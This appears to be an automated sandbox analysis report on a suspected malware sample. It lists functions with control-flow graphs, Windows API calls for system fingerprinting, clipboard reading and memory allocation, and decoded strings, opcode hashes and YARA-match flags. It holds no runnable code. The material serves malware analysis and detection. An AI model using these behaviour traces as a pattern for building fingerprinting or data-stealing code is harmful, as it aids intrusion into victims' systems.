                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: -^$AV$SE$X&
                                                      • API String ID: 237503144-3017178743
                                                      • Opcode ID: 126da50c2d0a41b480321852bc94709b34504f4e9e0a0586602205dd78c64019
                                                      • Instruction ID: 414b802ac07eb15e34250c72f36e95362d79bb1e0692564b293e6573eb188213
                                                      • Opcode Fuzzy Hash: 126da50c2d0a41b480321852bc94709b34504f4e9e0a0586602205dd78c64019
                                                      • Instruction Fuzzy Hash: 7A71AAB06083518FE324CF14D8A0BABB7E1EFC6314F114A2DE8E95B280D7789945CB97
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 310 414950-414964 311 414970-414978 310->311 311->311 312 41497a-4149ac RtlExpandEnvironmentStrings 311->312 313 4149b5 312->313 314 4149ae-4149b3 312->314 315 4149b8-414a4c call 433b50 RtlExpandEnvironmentStrings 313->315 314->315 318 414a93-414ac3 315->318 319 414a4e-414a4f 315->319 321 414ac5-414aca 318->321 322 414acc-414ace 318->322 320 414a50-414a91 319->320 320->318 320->320 323 414ad1-414ae8 call 433b50 321->323 322->323 326 414b11-414b21 323->326 327 414aea-414af3 323->327 328 414b41-414b55 call 438ba0 326->328 329 414b23-414b2a 326->329 330 414b00-414b0f 327->330 333 414b5a-414b76 328->333 331 414b30-414b3f 329->331 330->326 330->330 331->328 331->331
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041499D
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 004149CE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: 2M#O$<Y.[$r]Nm$qrs
                                                      • API String ID: 237503144-2765572984
                                                      • Opcode ID: 1eeaee2e8186193ac6611b8cf20863375f2d41a74451ba6092e37ba744e7f2b9
                                                      • Instruction ID: f437b4c60a0e393287c60c1191dc60451405bce4f387bbd6b600237a0ee68e47
                                                      • Opcode Fuzzy Hash: 1eeaee2e8186193ac6611b8cf20863375f2d41a74451ba6092e37ba744e7f2b9
                                                      • Instruction Fuzzy Hash: C751B2B46183419FD320CF14D891BABB7E5EFC6324F054A1DF9958B381E3B89941CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 427 424af5-424b44 428 424b46 427->428 429 424b89-424b92 427->429 430 424b50-424b87 428->430 431 424b94-424b9a 429->431 432 424bab-424ffd 429->432 430->429 430->430 433 424ba0-424ba9 431->433 435 425039-425042 432->435 436 424fff 432->436 433->432 433->433 437 425044-42504a 435->437 438 42505b-425065 call 431cd0 435->438 439 425000-425037 436->439 440 425050-425059 437->440 442 42506a-425076 438->442 439->435 439->439 440->438 440->440 443 42508b-4250b0 call 438070 442->443 444 425078-42507f 442->444 447 4250b5-4250d8 GetPhysicallyInstalledSystemMemory 443->447 445 425080-425089 444->445 445->443 445->445 448 4250da-4250e3 447->448 449 42512e-42513b 447->449 451 4250e5 448->451 452 42513d-425142 448->452 450 425153-4251b9 449->450 455 425203-425255 450->455 456 4251bb 450->456 457 4250f0-42511a 451->457 453 425121-42512c 452->453 454 425144-425150 452->454 453->450 454->450 459 4252a7-4252ad 455->459 460 425257 455->460 458 4251c0-425201 456->458 457->457 461 42511c-42511f 457->461 458->455 458->458 463 4252cb-4252d3 459->463 464 4252af-4252b2 459->464 462 425260-4252a5 460->462 461->453 461->454 462->459 462->462 466 4252d5-4252d6 463->466 467 4252eb-4252f7 463->467 465 4252c0-4252c9 464->465 465->463 465->465 468 4252e0-4252e9 466->468 469 42530b-4253a2 467->469 470 4252f9-4252ff 467->470 468->467 468->468 472 4253e3-4253ec 469->472 473 4253a4 469->473 471 425300-425309 470->471 471->469 471->471 475 42540b-425417 472->475 476 4253ee-4253f4 472->476 474 4253b0-4253e1 473->474 474->472 474->474 478 42542b-4254cc 475->478 479 425419-42541f 475->479 477 425400-425409 476->477 477->475 477->477 480 425420-425429 479->480 480->478 480->480
                                                      APIs
                                                      • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004250BF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: InstalledMemoryPhysicallySystem
                                                      • String ID: M:h:$P6D+$hFt=
                                                      • API String ID: 3960555810-4191368970
                                                      • Opcode ID: c278c4235c0e40e0a55a1437a375328b041559dd9e5fde0177f8855f0f599da5
                                                      • Instruction ID: 6d38b88902e1eb16ca30da568e3269f0221434b507219f1e067bc0dfabd335eb
                                                      • Opcode Fuzzy Hash: c278c4235c0e40e0a55a1437a375328b041559dd9e5fde0177f8855f0f599da5
                                                      • Instruction Fuzzy Hash: 6BF14C70504F928BD726CF35C4687A3BBE1AF56308F44496EC4FA8B792C779A406CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 481 424f8f-424ffd call 42c4d0 call 408700 487 425039-425042 481->487 488 424fff 481->488 489 425044-42504a 487->489 490 42505b-425076 call 431cd0 487->490 491 425000-425037 488->491 492 425050-425059 489->492 495 42508b-4250d8 call 438070 GetPhysicallyInstalledSystemMemory 490->495 496 425078-42507f 490->496 491->487 491->491 492->490 492->492 500 4250da-4250e3 495->500 501 42512e-42513b 495->501 497 425080-425089 496->497 497->495 497->497 503 4250e5 500->503 504 42513d-425142 500->504 502 425153-4251b9 501->502 507 425203-425255 502->507 508 4251bb 502->508 509 4250f0-42511a 503->509 505 425121-42512c 504->505 506 425144-425150 504->506 505->502 506->502 511 4252a7-4252ad 507->511 512 425257 507->512 510 4251c0-425201 508->510 509->509 513 42511c-42511f 509->513 510->507 510->510 515 4252cb-4252d3 511->515 516 4252af-4252b2 511->516 514 425260-4252a5 512->514 513->505 513->506 514->511 514->514 518 4252d5-4252d6 515->518 519 4252eb-4252f7 515->519 517 4252c0-4252c9 516->517 517->515 517->517 520 4252e0-4252e9 518->520 521 42530b-4253a2 519->521 522 4252f9-4252ff 519->522 520->519 520->520 524 4253e3-4253ec 521->524 525 4253a4 521->525 523 425300-425309 522->523 523->521 523->523 527 42540b-425417 524->527 528 4253ee-4253f4 524->528 526 4253b0-4253e1 525->526 526->524 526->526 530 42542b-4254cc 527->530 531 425419-42541f 527->531 529 425400-425409 528->529 529->527 529->529 532 425420-425429 531->532 532->530 532->532
                                                      APIs
                                                      • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004250BF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: InstalledMemoryPhysicallySystem
                                                      • String ID: M:h:$P6D+$hFt=
                                                      • API String ID: 3960555810-4191368970
                                                      • Opcode ID: f007e3d9ca2201ad5f316ff58b39a856bbcbb1e41c1eb315934e33bab86fd111
                                                      • Instruction ID: f66b18d75a9a4d2bb6148ac8f6660ab2d7ad2189567b3251afa320a6a21df7b8
                                                      • Opcode Fuzzy Hash: f007e3d9ca2201ad5f316ff58b39a856bbcbb1e41c1eb315934e33bab86fd111
                                                      • Instruction Fuzzy Hash: 0ED15A70504F528BE726CF35C4A87A7BBE1AF56308F44496DC0FA8B792C779A406CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 533 41df50-41e009 534 41e059-41e099 RtlExpandEnvironmentStrings 533->534 535 41e00b 533->535 537 41e0a2 534->537 538 41e09b-41e0a0 534->538 536 41e010-41e057 535->536 536->534 536->536 539 41e0a5-41e12e call 433b50 RtlExpandEnvironmentStrings 537->539 538->539 542 41e130-41e16b 539->542 543 41e16d-41e17a call 417810 539->543 542->542 542->543 545 41e17f-41e182 543->545
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041E08D
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 0041E0BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: ru$M3
                                                      • API String ID: 237503144-652937946
                                                      • Opcode ID: 7291a3a811873626bd3b785a5b847c75c0ba1258cac978df8a67f20d3e36ac33
                                                      • Instruction ID: ee0422986e9a500056daf517ec787597a82c07e08ececa7a1628db096f87ed23
                                                      • Opcode Fuzzy Hash: 7291a3a811873626bd3b785a5b847c75c0ba1258cac978df8a67f20d3e36ac33
                                                      • Instruction Fuzzy Hash: 585153B5108381AFE314CF01C990B5BBBE5ABCA354F10892DF8A55B381C775DA868B96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 546 431dd5-431e35 call 438070 GetVolumeInformationW
                                                      APIs
                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00431E18
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: InformationVolume
                                                      • String ID: :$C$\
                                                      • API String ID: 2039140958-3809124531
                                                      • Opcode ID: 66204d55befe17f0d94a4a8d29d4561092dd70cceac0cbdb9e091147346ca143
                                                      • Instruction ID: c07b020124bcaf9168d5cc752a0c39b43d1a69f77c2585f3e396cbfa2ffbe00c
                                                      • Opcode Fuzzy Hash: 66204d55befe17f0d94a4a8d29d4561092dd70cceac0cbdb9e091147346ca143
                                                      • Instruction Fuzzy Hash: 09F06574654301BBE328CF10ED27F1A72A49F86B04F20982DB245961D0E7B5AA189A5D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      • in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified, xrefs: 00408CBD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified
                                                      • API String ID: 621844428-4175449110
                                                      • Opcode ID: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
                                                      • Instruction ID: 59104990f458cfd7c5091e5889e4cb5e8d5d284f7426018ae83b6ee6547e8fc3
                                                      • Opcode Fuzzy Hash: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
                                                      • Instruction Fuzzy Hash: 8CF081B180D61496FA107BB56B0A26A3E786F20354F10063FE8C2751C2EE3D444952BF
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL ref: 0042D6B9
                                                      • GetSystemMetrics.USER32 ref: 0042D6CA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherMetricsSystemUser
                                                      • String ID:
                                                      • API String ID: 365337688-0
                                                      • Opcode ID: 9f3c4366f6acc61bef91b6474569325c5038b687278105cc48c3da76987b540e
                                                      • Instruction ID: e31df5cf53579e26f0d038b5bc67af8e11bea7006768dfca6b49015060dc1ea9
                                                      • Opcode Fuzzy Hash: 9f3c4366f6acc61bef91b6474569325c5038b687278105cc48c3da76987b540e
                                                      • Instruction Fuzzy Hash: D53154B4A10B009FD360DF3DC945A22BBE8FB0C600B100A2DE99AC7B50E734B8448B96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041784A
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 0041787E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID:
                                                      • API String ID: 237503144-0
                                                      • Opcode ID: 591883fc8cc7e98f5393b82a229ecb00a65222f46bfedd7c35e61c2a286ee97b
                                                      • Instruction ID: 5e955635065adc13492d4d85393db762cd4c4b4ecf76f0ca5c4caab7127c9149
                                                      • Opcode Fuzzy Hash: 591883fc8cc7e98f5393b82a229ecb00a65222f46bfedd7c35e61c2a286ee97b
                                                      • Instruction Fuzzy Hash: EF0104719082047BE7109B65DC86FA77BACEB86774F044629F965C72D0E730A814CBB6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00000400,?,?,02EB0223,?,?), ref: 02EB0E19
                                                      • SetErrorMode.KERNELBASE(00000000,?,?,02EB0223,?,?), ref: 02EB0E1E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction ID: 7c0daa33c795dd7ca716775d119377a50544ef27166bc557bc48ce0b05e24fda
                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction Fuzzy Hash: C9D0123514512877DB012A94DC09BCE7B1CDF05B66F008011FB0DD9080C770954046E5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: AllocString
                                                      • String ID:
                                                      • API String ID: 2525500382-0
                                                      • Opcode ID: 92e831a09bc4f936f48e8eeb5ce323eeb4de5efd6650885b8006177c34b915f1
                                                      • Instruction ID: 185172400866e4ae2881ea4d0131f492a55f0fd6362865a65d31d09921d293dc
                                                      • Opcode Fuzzy Hash: 92e831a09bc4f936f48e8eeb5ce323eeb4de5efd6650885b8006177c34b915f1
                                                      • Instruction Fuzzy Hash: 42416870208B82DFC324CF28C498716BBE1BB89314F04465DD4EA8BB91DB35E659CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: AllocString
                                                      • String ID:
                                                      • API String ID: 2525500382-0
                                                      • Opcode ID: bf016d29e845508b4c29d0072d113b8df78977f943dd86dea3f8dc8c8d2ed8b8
                                                      • Instruction ID: 21573400e3ca828b42bd540557a661cbeabd0db8bcf4d465cb8ddca8d915cba3
                                                      • Opcode Fuzzy Hash: bf016d29e845508b4c29d0072d113b8df78977f943dd86dea3f8dc8c8d2ed8b8
                                                      • Instruction Fuzzy Hash: 9A414770108B829FD315CF28C498746FFE0BB5A314F04875DD0EA8BB91D775A619CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 58b5376ab79715266d38842c771b014d24dd78366dfdce20fb51004989b06f61
                                                      • Instruction ID: 57a5b52b1dba13f0fb7b71c5e03f91b2e2e218f0aa26cdb764fcf0a20072f155
                                                      • Opcode Fuzzy Hash: 58b5376ab79715266d38842c771b014d24dd78366dfdce20fb51004989b06f61
                                                      • Instruction Fuzzy Hash: 65410770509342AFE708DF11C5A072BBBE2EFCA709F15991CE0851B381C779C94A8F9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: cf479fc7f12fc99e722106fa3c3008013ec3b7fe3fd27b656824b1d85b0085cc
                                                      • Instruction ID: 23712f21be747c25dae20e80d5a1b49733b7d245948cfec0266e9d122107ec55
                                                      • Opcode Fuzzy Hash: cf479fc7f12fc99e722106fa3c3008013ec3b7fe3fd27b656824b1d85b0085cc
                                                      • Instruction Fuzzy Hash: 3B219074519301ABD308CF20DAA072F7BE2AB86308F158A2DF48557251EB35C9058B8A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00433BF1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 54449b854ee1baebf3dc2fe8c903120477d739f3de66941c925630f34d378c1f
                                                      • Instruction ID: 0fd3648b48a7544cf81d28ba84819feb0670e69c12155dd868ef03761d14a466
                                                      • Opcode Fuzzy Hash: 54449b854ee1baebf3dc2fe8c903120477d739f3de66941c925630f34d378c1f
                                                      • Instruction Fuzzy Hash: F9111871208301AFD704CF15D46475BFBE5EBC5329F108A1DE8A90B691CB79EA09CBC6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 00437658
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: cc0bdeeb390416a8005f9aaf9f86a7cb8d3b6ea8d4e88d9dbda576cfd526ac67
                                                      • Instruction ID: 13577f52a53989cb91e50d4060b8e90c8ca223ec1dc92ff7deb6a5357cfe3386
                                                      • Opcode Fuzzy Hash: cc0bdeeb390416a8005f9aaf9f86a7cb8d3b6ea8d4e88d9dbda576cfd526ac67
                                                      • Instruction Fuzzy Hash: F30120715083519FE310CF04D99470FBBA2EBC4328F248A4DE8A82B285D375E9098BD2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00433CB4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 568252abd8bdcc9c59ee4889d44cb61b75dc80544815d0b9ec631bb4bbfb7d65
                                                      • Instruction ID: 6d027317d9507f32588684f48b86e6a4e16b8ed02588133254db7ad3e02295f4
                                                      • Opcode Fuzzy Hash: 568252abd8bdcc9c59ee4889d44cb61b75dc80544815d0b9ec631bb4bbfb7d65
                                                      • Instruction Fuzzy Hash: 1C01C8701083409FE314CF10C46471BBBE1EBC9328F208E4DE8A917691C779D949CF8A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02BF7E8E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298209608.0000000002BF7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02BF7000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bf7000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction ID: 269d887b223fdb9a2e395897a8099eb912f7572c1e26f91db00d52e280fc37cc
                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction Fuzzy Hash: 61113F79A00208EFDB01DF98C985E99BBF5EF08350F158095FA489B361D771EA50DF80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$CloseDataInfoOpenWindow
                                                      • String ID: 7$8$9$:$;
                                                      • API String ID: 2278096442-1017836374
                                                      • Opcode ID: 76df721bf2a579621502fc47aaa496d3d10c4b1d72995d62b2f3639b8e2e78c9
                                                      • Instruction ID: ec00451678d786202fcc9b385dd1a0758b5b4489dde3fc94fbb9c3a647e150fa
                                                      • Opcode Fuzzy Hash: 76df721bf2a579621502fc47aaa496d3d10c4b1d72995d62b2f3639b8e2e78c9
                                                      • Instruction Fuzzy Hash: 9E51CFB0608790DFC720DF38E18571ABBE0AF15314F54895ED8DA8B642D338E946DB6B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )$IDAT$IEND$IHDR
                                                      • API String ID: 0-3181356877
                                                      • Opcode ID: 6c61cf901b26535caeabdc15e67d8a414de8369403d95b9fb70e03a9b4839c69
                                                      • Instruction ID: 0be1a52e0df3b0dc3a032381c4f3c8b935ed6a2f1c2ceb181a6c55e0fd87ab6d
                                                      • Opcode Fuzzy Hash: 6c61cf901b26535caeabdc15e67d8a414de8369403d95b9fb70e03a9b4839c69
                                                      • Instruction Fuzzy Hash: 73121271A483848FDB05CF28CC947AB7BE1EF85304F04956DEA849B392D379D909CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$GetProcAddress.$l
                                                      • API String ID: 0-2784972518
                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                      • Instruction ID: b4dd453108a5522c759e0bce501b0671357776a429a33833e17f0f521ba5b6bb
                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                      • Instruction Fuzzy Hash: BE3148B6900609DFDB11CF99C880AEEBBF9FF48328F14914AD841A7250D771FA45CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0$8
                                                      • API String ID: 0-46163386
                                                      • Opcode ID: 700693516f04dbb2e79e809c93771d43800a53ac10f18a519c942675b9b09cc2
                                                      • Instruction ID: d662c1f9035bc11987ae765824793ea931146050dde1e78a2dadb8e4b1a1c4d9
                                                      • Opcode Fuzzy Hash: 700693516f04dbb2e79e809c93771d43800a53ac10f18a519c942675b9b09cc2
                                                      • Instruction Fuzzy Hash: 37726A716083419FD715CF28C890B9BBBE2BF88318F48992DF9898B391D775D944CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
